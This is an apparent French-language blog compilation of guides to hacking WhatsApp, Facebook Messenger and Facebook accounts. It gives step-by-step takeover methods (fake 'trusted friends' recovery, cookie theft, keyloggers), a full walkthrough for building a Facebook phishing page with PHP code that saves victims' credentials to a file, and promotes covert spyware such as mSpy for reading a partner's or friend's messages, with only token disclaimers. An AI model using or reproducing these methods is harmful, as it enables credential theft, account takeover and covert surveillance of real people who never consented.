  • Trouvez WhatsApp et accédez à ses options. Par exemple, vous pouvez choisir de supprimer les données de l’application.
→ Étape 1 : Faites une sauvegarde de vos chats Si vous n’avez pas fait de sauvegarde préalable de vos chats WhatsApp, il vous suffit de lancer l’application et d’aller dans ses paramètres en tapant sur l’icône du hamburger en haut. Accédez à ses paramètres de chat > Sauvegarde du chat et vérifiez si vous avez ajouté votre compte Google à WhatsApp. Appuyez sur le bouton “Sauvegarder” pour que l’application enregistre vos discussions WhatsApp sur le compte Google lié. Vous pouvez vérifier la fréquence de la sauvegarde automatique et même inclure/exclure les vidéos dans la sauvegarde. → Étape 2 : Restaurer la sauvegarde de WhatsApp à partir de Google Drive Une fois la sauvegarde effectuée, vous pourrez la restaurer plus tard sur votre appareil.
  • Pour ce faire, vous devrez d’abord supprimer WhatsApp et la réinstaller sur votre téléphone.
  • Maintenant, lancez l’application et assurez-vous à l’avance que l’appareil est lié au même compte Google.
  • Lors de la configuration du compte, saisissez le même numéro de téléphone que celui qui était lié à WhatsApp auparavant.
  • En un rien de temps, WhatsApp détectera automatiquement la présence d’une sauvegarde précédente. Il suffit de cliquer sur le bouton “Restaurer” et maintenir une connexion internet stable pendant la restauration de vos chats.

La lecture de Whatsapp sur le web est une méthode très risquée

… tout simplement parce que l’application mobile affiche un message au bas de l’écran comme quoi l’écran est dupliqué.

Dupliquer Whatsapp mobile sur Whatsapp web

Cette technique consiste à utiliser le service web de WhatsApp. N’oubliez pas que vous ne pouvez pas effectuer ce piratage sur quelqu’un sivous n’avez pas pas accès à son téléphone. Les étapes sont les suivantes :
  • Ouvrez WhatsApp sur le téléphone cible et cliquez sur l’icône du menu en haut à droite.
  • Cliquez sur WhatsApp Web.
  • Depuis Chrome, ouvrez le site sur le bureau PC. Un code QR vous sera présenté.
  • Scannez le code depuis votre téléphone cible, et vous serez automatiquement connecté.

QR Code Whatsapp Web

Comme je l’ai précisé, les versions d’Android 7.1.2 et d’iOS 10 activent une notification constante sur le téléphone de la cible chaque fois que WhatsApp Web est activé.

Conclusion

J’espère que ces méthodes faciles pour pirater WhatsApp vous aideront à accéder à vos conversations personnelles. Après le piratage, vous pouvez envoyer ou recevoir des messages WhatsApp sans avoir accès au téléphone. Vous pouvez aussi lire les messages de chat. Si vous trouvez cet article utile, s’il vous plaît partagez-le. Si vous avez des problèmes tout en piratant le compte WhatsApp ou Messenger, faîtes-le nous savoir. Nous ferons notre possible pour vous aider à l’aide de méthodes de piratage de WhatsApp simples et sans connaissance requise.

Deux autres articles sur le blog:

Pirater Messenger

Avertissement : Ces méthodes ne sont pas dévoilées à des fins illégales mais à des fins d’information dans le but de récupérer et sauvegarder vos propres comptes.

Comment pirater Facebook Messenger?

C’est une question très large. Facebook Messenger, le tchat made in Facebook, peut être piraté comme tout autre logiciel fonctionnant sur un serveur, mais pour répondre à cette question vous devez déconstruire le terme de “piratage”.

Si vous parlez d’accéder aux messages d’un compte Messenger, cela peut se faire de plusieurs façons.

1/ La technique des trois amis

Cette technique consiste à faire exprès de commettre des erreurs de connexion en tentant de vous connecter à Messenger grâce à l’adresse Email de la cible. Au bout de quelques erreurs de mots de passe, Facebook Messenger reconnaît que vous avez des problèmes à vous connecter et vous demande si vous voulez utiliser des moyens alternatifs de connexion. Répondez que vous avez perdu votre adresse Email et que vous voulez en choisir une autre. Messenger vous demande de prouver que c’est bien vous en vous demandant 3 amis qui vous suivent déjà sur votre compte. Ces 3 amis serviront à authentifier votre compte.

La technique consiste donc à prévoir le hacking de Messenger préalablement en créant avant ça 3 comptes Facebook différents et en envoyant des demandes d’amis à la cible. Si la cible accepte, vous aurez ainsi 3 comptes Messenger différents qui suivent déjà la cible. Lorsque Messenger vous demande 3 amis pour changer d’adresse Email, donnez les coordonnées des 3 comptes Facebook que vous avez créés et qui suivent déjà la cible. Facebook demandera à ces 3 amis de valider votre changement d’Email, vous pourrez le valider facilement. Après ça, il vous suffira de changer d’adresse Email, de valider cette nouvelle adresse Email, de vous connecter au compte et de changer le mot de passe!

L’inconvénient de cette technique :
Le compte cible s’apercevra rapidement du hacking, et pourra connaître votre adresse IP à moins que vous ne sachiez comment la dissimuler. En effet, Facebook envoie un email dès qu’il s’aperçoit qu’on tente en vain de se connecter. 

2/ La méthode de la force brute

La manière la moins efficace de le faire est la méthode de force brute, qui consiste à en essayer toutes les combinaisons possibles de mots de passe jusqu’à ce que l’on tombe sur le bon. Cette méthode ancienne, reposant sur des logiciels sans fin, est aujourd’hui inefficace. 

L’inconvénient de cette technique :
Facebook a appris à se protéger contre cette technique.

3/ L’hameçonnage

Une autre méthode est l’hameçonnage, une astuce d’ingénierie sociale consistant à amener la cible à entrer ses informations de connexion sur un site frauduleux copiant l’original. Le lien de mon article explique la marche à suivre. 

  • Pour résumer, achetez un domaine web avec un nom lié à Facebook (c’est-à-dire FacebookAdmin, FacebookAlerte, etc.) et créez une adresse électronique comme staff@facebookalerte.com.
  • La page d’accueil de ce site doit ressembler exactement à l’écran de connexion de Facebook.
  • Vous pouvez envoyer un message électronique à votre victime à partir de l’adresse électronique que vous avez créée, étant entendu qu’elle croit qu’il s’agit d’un message de Facebook.
  • Vous (en prétendant être Facebook) l’invitez à se connecter (en suivant le lien vers le domaine que vous avez créé) à son compte pour mettre à jour ses informations personnelles.
  • Elle est redirigée ensuite vers la page de renvoi que vous avez créée et qui n’est autre que l’écran de connexion officielle de Facebook.
  • Ça y est est, vous avez les identifiants recherchés !

Contrairement à l’approche du keylogging que nous verrons ci-dessous, vous n’avez pas besoin de logiciel, mais plutôt de talents d’ingénierie sociale

L’inconvénient de cette technique :
Ce type d’attaque revient à faire une utilisation abusive de l’ordinateur et vous fait commettre une infraction pénale. L’authentification à deux facteurs et Facebook peut envoyer un courriel à la cible si vous tentez de vous connecter à partir d’un dispositif non reconnu. Il faut donc se connecter à partir d’appareil de confiance déjà utilisé pour accéder à ce compte pour contourner l’authentification en deux étapes.

4/ Le vol de cookie

Quand quelqu’un vole votre cookie, vous êtes piraté ! Les cookies sont les données de votre navigateur internet stockés sur votre disque dur local. Ils sont utilisés pour vérifier vos informations d’identification non seulement sur Facebook, mais aussi par tous les sites internet que vous visitez à partir de votre navigateur. Votre mot de passe n’est pas stocké dans des cookies mais plutôt dans des chaînes de hachage (voir cet article explicatif sur le site securiteinfo.com). Si quelqu’un vole vos cookies et les injecte dans son propre navigateur, il accède instantanément à votre compte. 

La vérification en deux étapes ou d’autres mesures de sécurité ne seront d’aucune utilité dans ce cas, tout simplement parce qu’à partir du moment où le cookie est injecté, votre session est copiée. L’utilisateur n’aura pas besoin de se reconnecter à votre compte : il accédera à votre session déjà connectée, après le stade où toutes les vérifications de sécurité ont été passées. Il pourra accéder à votre compte directement.

Si le pirate ne change pas votre mot de passe, vous pourrez toujours utiliser votre compte après le vol et l’usage de vos cookies.

Il y a trois façons de détruire la session que le pirate utilise:
a/ La déconnexion (en cliquant sur déconnexion dans le menu de Messenger). Comme le pirate accède à votre compte en utilisant la même session connectée que la vôtre, si vous vous déconnectez, Facebook détruira la session, et le pirate aura besoin de voler à nouveau vos cookies.
b/ Accédez aux paramètres de sécurité de Facebook. Vous y trouverez une liste de toutes les sessions connectées. Détruisez-les par vous-même, et le pirate se verra éjecté de votre compte Messenger.
c/ Vous pouvez aussi changer votre mot de passe : cela aura pour effet de détruire automatiquement toutes les sessions connectées.

5/ Le logiciel espion

Certains pirates utilisent des logiciels espions pour pénétrer sur vos comptes. Nous avons déjà parlé sur ce site de Mspy et Hoverwatch qui nous paraissent les plus fiables, et en français.

Le premier est spécialisé dans le vol des messages textes, des mots de passe et des réseaux sociaux.

L’application Mspy

Le deuxième est spécialisé dans le vol des conversations téléphoniques, l’enregistrement des appels téléphoniques et la copie des discussions sur toute messagerie instantanée.

L’application Hoverwatch

Ces logiciels espions s’installent sur le téléphone de la victime puis se rendent invisibles. Une vidéo sur Youtube explique comment installer ce genre de soft:

L’inconvénient de cette technique :
Il faut installer ces applications dans le téléphone ciblé, il faut donc l’avoir en main même si par la suite ce ne sera plus la peine. Notez que Mspy peut s’installer à distance mais uniquement sur un iPhone.

6/ La technique du keylogging

Les keyloggers sont des outils (logiciels ou matériels) qui permettent à un tiers d’intercepter et de mémoriser les touches pressées sur un appareil.

Les keyloggers peuvent enregistrer toutes les informations que la victime saisit avec son clavier, y compris les mots de passe destinés à accéder aux réseaux sociaux, aux emails, ou aux messageries instantanées (Facebook Messenger, WhatsApp, etc.). Ils enregistrent aussi ce qui est recherché sur internet.

Les keyloggers matériels

Il s’agit de petits appareils qui peuvent se brancher sur le câble qui relie l’ordinateur et son clavier. Souvent, vous constaterez que ça ressemble à un adaptateur USB. L’installaton est simple : 

  • Connectez l’appareil via le port USB (entre le clavier et le PC).
  • S’il se connecte sans fil, insérez simplement le récepteur dans un port USB disponible.
  • Pendant sa présence avec le PC, l’appareil enregistrera automatiquement tous les mots tapés. Les textes et les mots de passe sont sauvegardés dans la mémoire interne de l’appareil sous la forme d’un fichier numérique .txt.
  • Une fois que vous êtes tranquille, récupérez l’appareil et regardez les données qu’il a collectées.

J’ai testé un keylogger que j’ai acheté chez Amazon, et je dois dire qu’il a fonctionné exactement comme prévu. Il a rassemblé toutes les informations et les a stockées proprement dans un fichier accessible.

L’inconvénient de cette technique :
Toutes les informations saisies sur le clavier sont recensées dans un grand fichier séquentiel. Ce fichier n’est pas présenté comme un rapport détaillé mais plutôt comme une succession de mots sans mise en forme. A vous de savoir à quoi ces mots correspondent.

Cette technique a d’autres limitations qu’il faut connaître :

  • Vous ne pouvez utiliser ces keyloggers matériels que sur des ordinateurs de bureau ou des PC sous Windows/Mac. Les keyloggers ne fonctionnent pas sur les smartphones.
  • Ils ne sont pas discrets, et tout appareil physique peut être repéré, surtout si les ports USB sont visibles. 
  • Cette mesure ne permet pas de contourner l’authentification ou la vérification en deux étapes mise en place par Facebook et d’autres sites. Si vous utilisez des identifiants pour vous connecter sur un appareil différent, il est probable que le propriétaire recevra une alerte par email  pour le motif “activité suspecte”.

Les keyloggers logiciels

Les keyloggers logiciels sont plus intelligents, plus faciles et plus sûrs que leur version matérielle. Ils présentent également moins de complications et moins de limitations.

Vous avez besoin :

  • D’un accès à l’appareil de la victime (téléphone ou ordinateur)
  • Savoir comment installer un fichier logiciel sur un PC ou une application sur un smartphone

Les keyloggers logiciels sont des programmes informatiques installés directement sur l’appareil, et ils sont développés avec l’intention de sauvegarder chaque frappe effectuée.

Vous voulez savoir une bonne nouvelle ?

Jusqu’à récemment, vous ne pouviez installer ces enregistreurs de frappe logiciels que sur ordinateur. Mais aujourd’hui, ils sont disponibles sous forme d’applications pour téléphones Android et iOS.

L’installation de ces applications est simple. L’un des logiciels les plus utilisés à cette fin est mSpy, le même dont nous avons mis le lien ci-dessous dans la catégorie “logiciel espion”. Il fonctionne à la fois pour les ordinateurs et les appareils mobiles.

Les avantages de cette technique :
Facilité d’utilisation: Vous n’avez pas besoin de compétences informatiques, surtout avec des logiciels comme mSpy. Vous bénéficiez d’une assistance à 100 % tout au long de l’installation et il existe même des tutoriels vidéo que vous pouvez utiliser pour vous aider.
Protection contre les pièges: Le logiciel est pratiquement indétectable, de sorte que personne ne remarquera pas qu’il enregistre les entrées du clavier.
Rapidité: Dès que la cible accède aux réseaux sociaux, vous avez également accès à ses informations d’identification.
Contrôlé à distance : Oui

Conclusion

Notez aussi une autre technique que nous avons expliquée dans cet article : elle consiste, si vous avez accès à l’ordinateur de la cible, à afficher le code source de sa session Messenger afin d’afficher le mot de passe et de le récupérer. Au terme de ce tour d’horizon des différentes techniques pour hacker Messenger, nous espérons avoir éclairici la question de savoir comment pirater Messenger.

Pirater un compte Facebook : les différentes techniques en 2020

Comment pirater un compte Facebook

Que ce soit pour récupérer son compte Facebook après une perte de mot de passe ou pour le pirater purement et simplement tel un hacker, de nombreux d’entre nous peuvent être tentés un jour par les techniques de piratage d’un compte Facebook.

Si le piratage de Facebook est extrêmement demandé aujourd’hui, c’est que les gens vivent deux vies :

  • l’une physique
  • et l’autre virtuelle.

L’identité en ligne de chaque internaute s’apparente à son portefeuille.

  • Nouveaux contacts,
  • nouveaux collègues,
  • nouveaux amis et nouvelles relations,

…tous et toutes trouvent leur place dans ce média social généraliste. Toutes les informations importantes, les données personnelles, l’intimité et les secrets sont conservés sur les serveurs de Facebook. En d’autres termes, si quelqu’un pouvait accéder à ces données, il pourrait les utiliser comme il voudrait.

  • Pour espionner les activités de leurs enfants,
  • récupérer leur compte Facebook piraté,
  • lire et regarder la vie de leurs amis,

…les gens recourent au piratage de Facebook. Mais pirater un compte n’est pas chose aisée, puisque comparés aux millions de personnes qui cherchent à pirater FB tous les jours, seuls quelques exploits existent encore pour pénétrer avec succès ce réseau social. Vous avez peut-être entendu parler de la technique de la perte du mot de passe pour récupérer un nouveau mot de passe Facebook en connaisant simplement la messagerie Email de la victime ? Eh ! bien cette technique ne fonctionne plus, Facebook ayant tout simplement mis en place un blocage du compte lorsque l’adresse IP de connexion lui semble différente de la normale.

Nous allons voir que de nombreuses techniques existent mais que certaines d’entre elles ne sont pas fiables.

De même, certaines de ces techniques ne font pas que le piratage de Facebook mais également celui d’autres moyens de communication. Bref, quelle technique est la bonne pour vous ?

1/ Face-Geek : une arnaque ?

Face-Geek.com est un site très bien placé dans Google lorsqu’on se renseigne pour pirater un compte Facebook, et en effet leur site est assez bien fait : il est doté d’un blog, d’une FAQ et sa page d’accueil donne envie.

Face-Geek.com affirme que son équipe est capable de hacker tout compte Facebook en retrouvant en quelques minutes seulement le mot de passe du compte à deux conditions :

  • 1/ que vous connaissiez son identifiant (pour cela, rien de plus simple, il s’agit du numéro situé dans l’url du compte Facebook après https://www.facebook.com/profile.php?id=xxxxxxxxxxxx (les xxxxxxxxxxxx sont les numéros identifiants).
  • 2/ que le mot de passe fasse moins de 20 caractères

C’est beau ! me suis-je dit, puis j’ai commencé à douter quand j’ai lu que le site proposait ce service gratuitement malgré un “formulaire” à remplir pour soit-disant “éviter les surcharges de réseau”. Là je me suis dit deux choses :

  • 1/ l’entretien d’un site recevant des milliers de visiteurs coûte de l’argent, comment se font-ils rémunérer ?
  • 2/ un formulaire à remplir ? quelle technique anti-spam bizarre alors qu’il existe justement des captcha justement prévus pour ça, ou mieux, des re-captcha, algorithmes invisibles inventés par Google pour contrer les bots. Bref.

Je me suis un peu renseigné sur la réputation du site Face-Geek.com et je dois dire que je ne le testerai jamais moi-même de peur d’être victime d’une arnaque ou de phising. Pourquoi je dis ça ? Observez plutôt les commentaires sur la page Facebook du site :

Commentaires sur la page Facebook de Face-geek.com

Certains commentaires affirment :

  • “C’est une arnaque il marche même pas”
  • “Good luck”
  • “Ca marche pas”

Ensuite je me suis rendu sur https://www.lesarnaquesinternet.com/arnaque-face-geek.com.html et là on peut lire à peu près les mêmes remarques :

Donc voilà pour ma part, j’arrête de me renseigner sur ce site en lequel je ne fais pas confiance. D’autant plus que si Facebook avait eu connaissance de cette “facilité” avec laquelle un site pouvait récupérer les mots de passe de TOUS SES UTILISATEURS, cela fait bien longtemps que Facee-geek.com aurait été assigné en justice ou qu’une parade aurait été trouvée…

2/ Tous les autres sites de craquage de mots de passe

… genre Samhacker.com et compagnie…

Comme le dit justement Le blog du Hacker à cette adresse, ces sites sont des arnaques pures et simples car il n’est tout simplement pas possible de percer un compte Facebook simplement à l’aide de l’Email du compte ou de son identifiant. C’est impossible et d’ailleurs Facebook a mis en place de nombreuses techniques de sécurité, de plus en plus efficaces, contre ça :

  • envoi d’un texto sur votre portable avec un code à taper dans Facebook
  • détection d’une nouvelle adresse IP autre que la vôtre qui tente de se connecter à votre compte
  • suspension temporaire de votre compte par mesure de sécurité, le temps que vous répondiez à votre question secrète

Vous vous rappelez de la phrase :

Quand un produit est gratuit, c’est que c’est vous le produit
Avec ces sites “gratuits” c’est exactement ça. Il y a automatiquement une arnaque. Savoir comment pirater un compte facebook sans logiciel mérite un peu plus de d’inventivité, comme nous allons le voir ci-dessous.

3/ Alors comment faire pour vraiment pirater un compte Facebook ?

  • 1/ Un hacker vraiment motivé pourrait créer un faux site Facebook et vous envoyer un faux Email se faisant passer pour le réseau social. C’est la technique du Phising : vous vous connectez à ce site en rentrant vos identifiants, et le hacker récupère du coup votre mot de passe.
  • 2/ Un logiciel malveillant a été installé dans votre ordinateur à la manière d’un virus qui enregistre tout ce que vous tapez au clavier : ce sont des keyloggers. Le jour où vous vous connectez à Facebook en rentrant votre identifiant et votre mot de passe, le keylogger l’enregistre et le retransmet au hacker.
  • 3/ C’est votre smartphone tout entier qui a été piraté à l’aide d’un logiciel espion pour smartphone, dont le plus réputé d’entre eux est Mspy. Pour cela, l’individu doit prendre le téléphone en main et y installer l’application invisible. Ce type d’application pour téléphone portable envoie au pirate les messages Facebook, les messages des autres réseaux sociaux, mais aussi les Emails, les appels et les localisations de l’appareil.
  • 4/ Votre session Windows a été détournée : Lorsqu’un utilisateur navigue sur son flux Facebook, des informations concernant son statut de connexion servent à indiquer qu’il est authentiquement connecté. A cette fin, des petits fichiers inoffensifs sont enregistrés sur votre disque dur : on les appelle des cookies. Cryptés, ils contiennent des données très sensibles. Le détournement de ces cookies peut aider à accéder au compte Facebook d’une victime. Il faut des connaissances en hacking pour accéder à ces fichiers et les utiliser pour déchiffrer le mot de passe facebook de la victime.
  • 5/ La méthode de la force brute consiste à envoyer des requêtes aux serveurs Facebook à très grande vitesse. Au bout d’un certain temps, à force d’essais répétés, le mot de passe correct peut être trouvé. Cette méthode consomme beaucoup de ressources et n’est pas recommandée, les gros sites sachant dorénavant s’en protéger.
  • 6/ Le DNS Spoofing est l’une des méthodes les plus avancées pour pirater Facebook avec un taux de réussite élevé. Il s’agit d’accéder au PC ou à l’appareil mobile de la victime et de modifier les adresses DNS d’internet. De cette façon, toute information devant être envoyée aux serveurs de Facebook sera envoyée à un serveur pirate. Cette méthode de piratage est assez difficile à mettre en place, mais en cas de succès le taux de réussite du piratage de facebook est de 100%.
  • 7/ Enfin, comme indiqué dans cet article d’un Geek, les clés USB peuvent être utilisées pour lancer un programme à votre insu. Les “Bots USB” sont assez couramment utilisés dans le domaine du piratage de comptes facebook.

→ La vieille technique de l’ingénierie sociale pour pirater un compte Facebook

L’ingénierie sociale est une façon intelligente d'”arnaquer” les gens pour qu’ils vous donnent accès à leurs données de connexion sur Facebook. Il existe plusieurs méthodes créatives pour cette approche, les suivantes étant les plus populaires:

  • 1/ Se faire passer pour un technicien – Appelez la cible en vous faisant passer pour un technicien Facebook et demandez-lui de vous fournir ses données de connexion pour que vous puissiez vérifier son compte. Vous serez surpris de voir combien de personnes sont prêtes à donner leurs secrets si elles pensent qu’une figure autoritaire est au téléphone avec elles.
  • 2/ Emprunter le téléphone – Demandez à emprunter le téléphone de la cible, vous pouvez obtenir les informations de connexion en quelques secondes grâce à cette stratégie.

→ Utiliser un Keylogger pour pirater le mot de passe de Facebook

Les keyloggers enregistrent les frappes qu’une cible presse sur son clavier. Ils analysent les données recueillies pour craquer le mot de passe. Vous trouverez ci-dessous quelques-uns des keyloggers les plus populaires de nos jours.

Note: Étant donné qu’aujourd’hui les utilisateurs naviguent principalement sur les réseaux sociaux et internet à partir de téléphones, nous recommandons vivement d’utiliser un keylogger mobile.

Les keyloggers pour Windows et Mac OS

L’enregistreur de frappe ISAM

Cet outil d’enregistrement de frappe de qualité supérieure fonctionne secrètement sur un ordinateur et recueille les données des utilisateurs. ISAM enregistre les frappes au clavier et vous permet de visualiser l’appareil à distance, quel que soit l’endroit où vous vous trouvez. Faîtes des captures d’écran, surveillez vos employés ou vos enfants, tout cela discrètement. Son inconvénient : il n’a pas été mis à jour depuis le 25 septembre 2018 (son site de téléchargement).

Elite Keylogger

Utilisé pour surveiller plusieurs utilisateurs en même temps, Elite Keylogger offre une interface conviviale pour vous permettre de garder toutes vos données à portée de main (son site officiel).

Actual Keylogger

Ce programme surveille les activités de l’ordinateur ciblé. Installé secrètement, le logiciel envoie des rapports détaillés sur l’activité des utilisateurs du PC ou du MAC. Suivez les logiciels, les sites web qu’ils visitent, faîtes des captures d’écran et copiez le contenu dans leur presse-papiers. Le logiciel recueille également des données sur toutes les frappes (sa page de téléchargement).

Les enregistreurs de frappe pour téléphones portables

Si vous avez besoin d’un keylogger pour smartphone avec un système d’exploitation Android ou iOS, nous vous recommandons d’essayer ces 2 options:

mSpy

mSpy est l’outil de surveillance et de suivi mobile le plus utilisé de nos jours. Il regorge de fonctionnalités utiles qui incitent les utilisateurs à choisir mSpy plutôt que ses concurrents. Ses fonctionnalités les plus utilisées sont les suivantes :

  • Surveillance invisible des applications de messagerie (Facebook Messenger / WhatsApp / SMS / Viber / Instagram / autres
  • Suivi de la localisation du téléphone
  • Suivi des conversations téléphoniques (sortantes et entrantes)
  • Pris en charge pour les appareils Android et iOS

(ici la meilleure offre mSpy)

Hoverwatch

Hoverwatch vous permet de surveiller à distance n’importe quel appareil Android ou iOS. Ce logiciel primé vous permet de garder un œil sur vos enfants, votre conjoint et votre employé, avec bien sûr leur accord pour respecter la loi. Suivez leurs mouvements et gardez un œil sur vos biens, le tout depuis votre appareil mobile. L’espion SMS fourni vous permet de lire les textes entrants et sortants, tandis que l’écoute du téléphone vous permet d’enregistrer les conversations.

(le site officiel)

→ La méthode du phishing

Le phishing est un moyen courant utilisé pour pirater un compte Facebook. Le phishing est la méthode de base pour de nombreux pirates informatiques, car il est très facile de tromper l’utilisateur en lui demandant de donner aveuglément ses identifiants Facebook sans qu’il le sache.

Le phishing est responsable de 80 % des piratages de comptes et cette statistique ne risque pas de changer de sitôt, grâce à son taux de réussite pour pirater un mot de passe. Concrètement, les pirates créent une fausse page de connexion à Facebook qui ressemble à la vraie.

Le pirate envoie ensuite à la cible un courriel ou un message texte en se faisant passer pour le personnel d’administration de Facebook. La communication indique que l’utilisateur doit se connecter à son compte Facebook pour des raisons de sécurité ou pour vérifier le texte d’un ami. Le message contient un lien vers la page de phishing, et lorsque l’utilisateur clique sur le lien, il se retrouve sur la page du pirate au lieu de la page de connexion Facebook légitime.

La victime saisit alors son nom d’utilisateur et son mot de passe. Dans de nombreux cas, le pirate informatique redirige ensuite la fausse page de phishing au site Facebook officiel, ce qui permet à la victime de visiter sa vraie page après s’être connectée. Cette stratégie laisse la cible dans l’ignorance totale de toute activité suspecte. Elle donne aussi au pirate informatique tout le temps nécessaire pour accéder à la page et faire ce qu’il veut du compte: y compris changer le mot de passe pour verrouiller l’utilisateur.

Puisque Facebook est lié à Instagram, il est possible pour le pirate d’accéder également à votre compte Instagram. Les pirates informatiques volent vos données et les vendent sur le darkweb à des utilisateurs qui commettent des cyberdélits tels que la fraude et l’usurpation d’identité.

La mise en place d’une page de phishing est un processus compliqué et la plupart des pirates informatiques ont besoin d’outils logiciels spécialisés pour monter des escroqueries de phishing. Cependant, il est possible de créer une page de phishing, à condition de savoir ce que vous faîtes.

Comment créer une page de phishing Facebook à partir de rien

La conception d’une page de phishing n’est pas aussi difficile que vous le pensez. Tout ce dont vous avez besoin c’est d’un PC, une connexion internet, la volonté d’apprendre quelques bases du langage HTML, un compte d’hébergement web et un bloc-notes. Si vous disposez de ces outils, vous pouvez suivre cette méthode pour mettre en place votre première page de phishing Facebook.

Étape 1

Déconnectez-vous de votre compte et visitez la page de connexion par défaut de www.facebook.com. Cliquez avec le bouton droit de la souris n’importe où sur la page. Cliquez sur “Voir le code source”. Sélectionnez tout le texte et copiez-le dans le bloc-notes (CTRL+A puis Copier). Ouvrez une page blanche du bloc-notes puis collez tout à l’intérieur.

Étape 2

Cliquez sur le haut du texte dans le bloc-notes avec le bouton gauche de la souris. Maintenez la touche CTRL+F enfoncée et tapez “action=” dans la zone de recherche sans les guillemets. Cliquez sur “Find Next”. Il devrait y avoir deux “action=” dans le texte, c’est le premier qui nous intéresse. Remplacez le lien entre les guillemets par “post.php“. Ne changez pas les guillemets, mais seulement le texte entre les guillemets. Allez ensuite dans Fichier > Enregistrer sous et nommez le fichier “index.html“. Réglez l’option d’encodage sur “Unicode”.

Étape 3

Créez un nouveau document bloc-notes avec le nom de post.php. Copiez et collez le code suivant dans ce document et sauvegardez :

<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(‘usernames.txt’, ‘a’);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, ‘=’);
fwrite($handle, $value);
fwrite($handle, ‘rn’);
}
fwrite($handle, ‘rn’);
fclose($handle);
exit;
?>
Étape 4

Vous aurez besoin d’un compte d’hébergement web puisqu’une page de phishing est essentiellement une page de site web sur un compte hébergé. Cela peut poser un problème à certaines personnes qui souhaitent le faire gratuitement, mais il existe des solutions d’hébergement gratuites. Le problème avec ces solutions gratuites, c’est que ces comptes sont souvent suspendus parce que le phishing n’est pas autorisé par la plupart des sociétés d’hébergement.

Si vous voulez être sérieux, nous vous recommandons d’opter pour un vrai nom de domaine et un hébergement payant. Comme vous avez payé pour cela, vous êtes propriétaire et vous pouvez mettre sur votre site web et héberger tout le contenu que vous voulez. Il existe des tonnes de sociétés qui proposent des hébergements et des noms de domaine.

Étape 5

Téléchargez ces 2 fichiers d’affichage et d’indexation sur votre compte d’hébergement web (index.htm et post.php) dans le dossier “public_html”. Parfois vous devrez supprimer le fichier default.php qui existe déjà. Connectez-vous ensuite à votre cPanel, puis allez dans le gestionnaire de fichiers > public_html.

Vous êtes maintenant prêt à utiliser votre page de phishing. Si c’est un compte gratuit, visitez le lien personnalisé que vous avez reçu lors de l’inscription à votre compte d’hébergement web. Si vous avez enregistré un vrai nom de domaine, alors votre nom de domaine est votre site web de phishing.

Lorsqu’une victime suit ce lien, elle se retrouve sur votre page de phishing et lorsqu’elle saisit son nom d’utilisateur et son mot de passe, la page le stocke dans le fichier nommé “usernames.txt” qui sera automatiquement créé dans le même dossier “public_html”.

4/ La technique avec l’ordinateur en main et le code source

Pirater facebook en ligne gratuit sans code

Cette technique est très bien expliquée dans la vidéo ci-dessous ; elle est à la base utilisée pour tout simplement récupérer son mot de passe Facebook si on l’a perdu. Elle sert aussi à montrer qu’il est très facile pour un pirate de parvenir à ses fins à partir du moment où vous laissez traîner votre connexion internet.

La technique consiste à ouvrir Facebook. Si l’utilisateur a enregistré ses login/mots de passe dans son navigateur internet pour aller plus vite, alors le mot de passe est “masqué” et s’affiche à l’écran par des petits points. L’astuce consiste à placer sa souris sur le mot de passe masqué et à afficher le CODE SOURCE de la page web (en cliquant droit et en sélectionnant “inspecter”). Normalement l’écran qui se surimprime alors se place à l’endroit du code source où la souris est placée, dans le cas contraire c’est à vous de chercher les termes :

input type="password"

En remplaçant tout simplement le terme password par text sur votre clavier (en laissant les guillemets), le mot de passe Facebook cesse d’être affiché masqué mais se révèle alors au format texte visible. De ce fait, rien n’est plus simple pour vous de copier ce mot de passe et donc de le connaître.

Impression d’écran
Vidéo

Inconvénient de cette technique : elle nécessite d’avoir l’ordinateur ou le smartphone en main avec un compte administrateur. Autrement dit : à la base cette astuce est faite uniquement pour retrouver votre propre mot de passe Facebook quand vous l’avez perdu.

5/ Comment pirater le mot de passe de Messenger ?

Facebook a maintenant séparé sa messagerie du réseau social principal. Cependant, les deux restent liés au même compte ! De ce fait, pour pirater le mot de passe de Messenger, les mêmes techniques de piratage doivent être utilisées. Celles-ci incluent toutes les techniques mentionnées ci-dessus. En bref, si vous piratez le mot de passe d’un compte facebook, Messenger sera piraté en même temps.

La seule différence est que Messenger est plus souvent utilisé sur un smartphone que sur un ordinateur (il est conçu pour ça !). De ce fait, le moyen le plus facile pour pirater la messagerie Messenger de quelqu’un reste d’installer sur son mobile cette application de contrôle et de surveillance :

Peu excessive en terme de prix (14,16 euros), elle est compatible sur un iPhone et un Android

Ma conclusion

Hacker un compte facebook ou pirater Messenger sont des défis amusants permettant de connaître la vérité sur vos amis et ce qu’ils pensent de vous. Les conversations sur Facebook, par exemple, sont un moyen simple de connaître la réalité d’une relation, si la personne ciblée a donné son accord légal pour être surveillée (voir les mentions légales).

Mais nous essayons toujours d’être le plus impartial possible sur ce blog et finalement, Facebook est comme tous les autres réseaux sociaux et sites internet: totalement fiable si vous prenez soin de vous rendre dans les paramètres “Sécurité”, de personnaliser vos options de confidentialité et d’utiliser un pare-feu efficace pour éviter qu’un hacker n’emprunte votre connexion à distance.

Aujourd’hui Facebook a fait d’énormes efforts pour rendre son réseau social sûr à partir du moment où vous sélectionnez les bonnes options de confidentialité et de sécurité.

Pour le reste, si vous cherchez à pouvoir lire les messages Facebook et les Emails, ce qui fonctionne vraiment c’est d’installer Mspy dans le smartphone ciblé : au jour d’aujourd’hui tout le monde utilise un smartphone et la majorité du temps, c’est à partir de notre smartphone que nous accédons à nos réseaux sociaux et à nos mails.

Je plébiscite cette application de monitoring parce qu’elle est vérifiée et sûre en tant que logiciel pour pirater un compte facebook, contrairement à certaines autres. En infiltrant convenablement un smartphone grâce à Mspy, vous vous assurez d’avoir la manière la plus simple et efficace d’accéder à tout son contenu, photos et vidéos incluses.

Qui regarde mon profil Facebook? (mis à jour 2020)

Qui regarde mon profil facebook le plus ?

Il s’agit d’une des astuces Facebook les plus intéressantes qui soient. Elle vous aide à trouver qui consulte vraiment votre profil Facebook, et ce le plus souvent. Cet outil n’est pas proposé de base par Facebook, qui a sûrement ces raisons pour cela mais allez savoir quoi ? Sûrement des raisons de confidentialité.

Aujourd’hui, de nombreuses fausses applications se répandent sur Facebook avec de fausses informations sur les vues de profil. Impossible de dire si ces infos que l’on voit sont vraies ou fausses. Par contre, la méthode que je vous donne ici vous aidera à trouver les personnes visitant le plus souvent votre profil Facebook.


A/ Examinez en détail vos amis

Cliquez sur la liste de vos amis sur Facebook. Ce bouton se trouve près du haut de votre profil ; sur téléphone mobile, appuyez simplement sur Amis dans le menu.

